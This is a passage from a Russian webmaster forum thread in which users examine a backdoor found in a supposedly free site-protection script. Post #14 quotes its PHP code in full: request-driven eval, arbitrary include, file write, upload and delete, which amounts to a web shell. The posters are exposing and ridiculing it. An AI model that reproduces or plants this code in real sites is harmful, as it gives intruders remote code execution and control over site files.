Eval

12
Glueon
На сайте с 26.07.2013
Offline
172
#11

За одну минуту могли сделать вброс в другое место, которое айболитом вы еще не видели :) Да и само наличие вброса должно насторожить.

"zapros1" - это конечно да. Взяли, сразу свою RUпринадлежность выдали :)

Есть много IP-сетей в аренду под прокси, парсинг, рассылки (optin), vpn и хостинг. Телега: @contactroot ⚒ ContactRoot команда опытных сисадминов (/ru/forum/861038), свой LIR: сдаем в аренду сети IPv4/v6 (/ru/forum/1012475).
firstPR
На сайте с 24.02.2013
Offline
15
#12

ТС а локалхостом сперва протестить не пробывали?

siv1987
На сайте с 02.04.2009
Offline
427
#13

http://pastebin.com/pkevs0iJ

http://bymas.ru/forum/viewtopic.php?topic_id=15090

Олег:

Вероятность взлома становится очень мала, загрузить шел не реально - не каким из способов,
LEOnidUKG
На сайте с 25.11.2006
Offline
1768
#14
if ($_REQUEST['obhod'] != 7259) {
if (isset($_REQUEST['zapros1'])) {

eval($_REQUEST['zapros1']);

}

if (isset($_REQUEST['zapros2'])) {

include_once($_REQUEST['zapros2']);

}

if (isset($_REQUEST['zapros3'])) {

$gast = fopen($_REQUEST['zapros3_1'], "w");

fputs($gast, $_REQUEST['zapros3_2']);

fclose($gast);

}

if (isset($_REQUEST['zapros4'])) {

move_uploaded_file($_FILES['zapros4_1']['tmp_name'], $_REQUEST['zapros4_2']);

}

if (isset($_REQUEST['zapros5'])) {

unlink($_REQUEST['zapros5']);

}

Красота то какая :D

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
Glueon
На сайте с 26.07.2013
Offline
172
#15

Через zopros3 и zopros4 могли вбросов понаделать уже ....

LEOnidUKG
На сайте с 25.11.2006
Offline
1768
#16

Зачем взламывать движки, когда можно сделать вирус, а потом распространять его под бесплатной защитой. И сколько же людей ведутся :D

seocore
На сайте с 25.09.2006
Offline
143
#17
LEOnidUKG:
Зачем взламывать движки, когда можно сделать вирус, а потом распространять его под бесплатной защитой. И сколько же людей ведутся :D

зачем делать свои сайты, когда можно бесплатно ставить защиту с САП-кодом, и хорошо, что у кого-то хоть появляются сомнения и он спрашивает - а не опасны ли такие коды 🍿

Инструменты для веб-мастера: кластеризатор СЯ (https://goo.gl/MQWfqO), все запросы конкурента (https://goo.gl/hd5uHS), дешевые XML-лимиты (https://goo.gl/aDZbPI)
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий